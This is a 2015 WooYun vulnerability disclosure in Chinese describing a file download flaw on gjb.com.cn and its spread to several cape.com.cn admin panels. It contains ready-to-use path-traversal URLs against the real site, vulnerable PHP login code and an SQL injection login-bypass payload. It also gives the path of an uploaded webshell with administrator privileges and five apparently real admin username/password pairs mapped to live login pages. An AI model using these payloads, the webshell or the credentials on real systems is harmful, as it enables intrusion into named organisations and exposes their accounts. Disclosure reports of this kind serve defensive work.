当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101652

漏洞标题:标准化信息网任意文件下载导致工业与信息化标准网多站点安全问题

相关厂商:cncert国家互联网应急中心

漏洞作者: reglive

提交时间:2015-03-17 17:23

修复时间:2015-05-04 17:40

公开时间:2015-05-04 17:40

漏洞类型:任意文件遍历/下载

危害等级:低

自评Rank:2

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-20: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向核心白帽子及相关领域专家公开
2015-04-09: 细节向普通白帽子公开
2015-04-19: 细节向实习白帽子公开
2015-05-04: 细节向公众公开

简要描述:

http://www.gjb.com.cn/ 任意文件下载,导致后台地址暴露,数据库账号密码泄露,多站点后台统一口令。

详细说明:

http://www.gjb.com.cn/actionServer.php?action=downfile&fname=../index.php&ei=3kQGVe6qC4WAzAPZwYG4CQ&usg=AFQjCNH2QPP-ZmMTHmJtWQtCXVUyViUNAQ&bvm=bv.88198703,d.bGQ&cad=rjt


任意文件下载, 导致后台地址暴露,数据库账号密码泄露,多站点后台统一口令。
http://www.cape.com.cn/ecshop/admin/index.php
http://www.cape.com.cn/capemanage/index.php
http://cata.cape.com.cn/dede/login.php
http://zbbz.cape.com.cn:8080/

漏洞证明:

http://www.gjb.com.cn/actionServer.php?action=downfile&fname=../actionServer.php&ei=3kQGVe6qC4WAzAPZwYG4CQ&usg=AFQjCNH2QPP-ZmMTHmJtWQtCXVUyViUNAQ&bvm=bv.88198703,d.bGQ&cad=rjt


通过代码分析获得后台路径:http://www.gjb.com.cn/bzzx/index.php
程序漏洞很多,基本都没过滤参数,
万能密码:

$admin_name=$_POST["admin_name"];
		//hmy20141114
		if(!empty($_REQUEST['from']) && $_REQUEST['from'] == 'dedeorecs'){
			$admin_pass=$_POST["admin_pass"];
		}else{
			$admin_pass=md5($_POST["admin_pass"]);
		}
                $gotocms = "<a href='http://www.cape.com.cn/dede/login.php?from=ecshopskip&fromesc=esc&cmu=$admin_pass&cmp=$admin_pass' class='gjb-btn' title='国军标管理'></a>";
		//$admin_pass=md5($_POST["admin_pass"]);
		
		$sql="select * from admin where name='".$admin_name."' && pwd='".$admin_pass."';"; //注入啊,万能密码登录
		$result=mysql_query($sql,$conn);


后台直接:admin' or 1=1 #密码随意 ,登陆处理处还可以cookie伪造:

if($row=mysql_fetch_array($result))
		{
			$_SESSION['adminid']=$row["ID"];
			$_SESSION['AdminName']=$row["name"];
			$savepwd=trim($_REQUEST["savepwd"]);
			if($savepwd==1)
			{
				$xsecond = setcookday(7);
				setcookie('adminid',$_SESSION['adminid'],time()+$xsecond);
				setcookie('AdminName',$_SESSION['AdminName'],time()+$xsecond);
				//echo  $_COOKIE["AdminName"];
				
				
			}


mysql root 账号在 inc/conn.php ,后台下载管理处,任意文件上传:http://www.gjb.com.cn/userfiles/201503160554info.php,
php权限很高,为
C:\Program Files (x86)\EasyPHP-5.3.5.0\www\userfiles\> whoami
gjb-webserver\administrator
后台账号:
admin1 admin
gjb gjb1
admin Cape301
chenr chenr301
wangxm wangxinmin
可以登录站点:
http://www.cape.com.cn/ecshop/admin/index.php ecshop
http://www.cape.com.cn/capemanage/index.php dedecms
http://cata.cape.com.cn/dede/login.php dedecms
http://zbbz.cape.com.cn:8080/
dede二次开发的,估计也有漏洞,没有测试,登陆后台了很好拿shell。

3.png


2.png


1.png


修复方案:

第一个站点问题太多了,各种注入,重写吧。后台密码太简单,服务器权限配置,数据库用低权限账号

版权声明:转载请注明来源 reglive@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-20 17:38

厂商回复:

最新状态:

暂无